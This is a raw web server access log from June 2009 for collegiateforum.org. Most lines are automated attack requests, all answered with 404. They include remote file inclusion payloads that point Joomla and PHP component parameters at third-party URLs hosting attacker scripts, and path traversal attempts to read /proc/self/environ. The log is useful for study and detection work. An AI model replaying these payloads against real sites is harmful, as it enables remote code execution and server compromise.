194.63.248.44 - - [28/Jun/2009:17:00:35 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:00:35 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:00:35 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.234.18.13 - - [28/Jun/2009:17:01:17 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.234.18.13 - - [28/Jun/2009:17:01:22 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.234.18.13 - - [28/Jun/2009:17:01:22 -0700] "GET /appserv/main.php?appserv_root=http://www.masuccessguy.com//docs/book?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:02:10 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:02:10 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:02:10 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:02:51 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:02:51 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:02:51 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:04:59 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:04:59 -0700] "GET /logs/access_090330.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:04:59 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:17:05:26 -0700] "GET /logs/access_090330.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:17:05:26 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:17:05:26 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
65.55.210.229 - - [28/Jun/2009:17:06:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.210.229 - - [28/Jun/2009:17:06:25 -0700] "GET /Jonathan_Fantini_Porter/aboutus.php HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.210.229 - - [28/Jun/2009:17:06:25 -0700] "GET /Jonathan_Fantini_Porter/australia.php HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
80.247.76.181 - - [28/Jun/2009:17:08:05 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.247.76.181 - - [28/Jun/2009:17:08:05 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.247.76.181 - - [28/Jun/2009:17:10:03 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.247.76.181 - - [28/Jun/2009:17:10:03 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:10:50 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:10:50 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:10:50 -0700] "GET /logs/access_081208.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:11:22 -0700] "GET /logs/access.log//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:11:24 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:11:25 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:12:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:12:00 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:12:00 -0700] "GET /logs/access_081208.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:12:07 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:12:07 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:12:08 -0700] "GET /logs/access_081208.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:13:28 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:13:28 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:13:28 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:13:30 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:13:30 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:14:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:14:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:14:59 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:14:59 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:14:59 -0700] "GET /logs/access_081208.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:14:59 -0700] "GET /logs/access_081208.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:15:15 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:15:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:15:16 -0700] "GET /logs/access_081208.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:15:20 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
194.109.22.117 - - [28/Jun/2009:17:15:22 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.816" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:15:33 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:15:46 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:15:46 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:15:46 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:15:51 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:15:51 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:15:51 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:16:13 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:16:13 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:17:16:13 -0700] "GET /logs/access_081208.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:17:16:17 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:16:42 -0700] "GET /logs/access_090105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:16:51 -0700] "GET /logs/access_090105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:16:55 -0700] "GET /logs/access_090105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:19:02 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:19:02 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:19:02 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:20:11 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:20:34 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:20:42 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.253.238.151 - - [28/Jun/2009:17:21:12 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:24:10 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:24:10 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:24:10 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.210.57.83 - - [28/Jun/2009:17:24:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.collegiateforum.org"
195.210.57.83 - - [28/Jun/2009:17:24:25 -0700] "GET /logs/access_080114.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:24:43 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:17:25:22 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.0" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:17:25:22 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:17:25:22 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:17:25:22 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:25:52 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:17:25:52 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:31 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:31 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:33 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:36 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:37 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:37 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:47 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:49 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:29:49 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:30:47 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:32:24 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:32:24 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:32:39 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:32:39 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:33:00 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.11.230.251 - - [28/Jun/2009:17:36:44 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
66.11.230.251 - - [28/Jun/2009:17:36:44 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:38:06 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:38:28 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:38:50 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:39:11 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:39:53 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:39:53 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:39:55 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:39:56 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
78.110.50.134 - - [28/Jun/2009:17:42:37 -0700] "GET /logs/access.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "collegiateforum.org"
78.110.50.134 - - [28/Jun/2009:17:42:37 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "collegiateforum.org"
78.110.50.134 - - [28/Jun/2009:17:42:37 -0700] "GET /logs/access.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "collegiateforum.org"
78.110.50.134 - - [28/Jun/2009:17:42:37 -0700] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "collegiateforum.org"
78.110.50.134 - - [28/Jun/2009:17:42:38 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "collegiateforum.org"
78.110.50.134 - - [28/Jun/2009:17:42:38 -0700] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:02 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:02 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:22 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:22 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:28 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
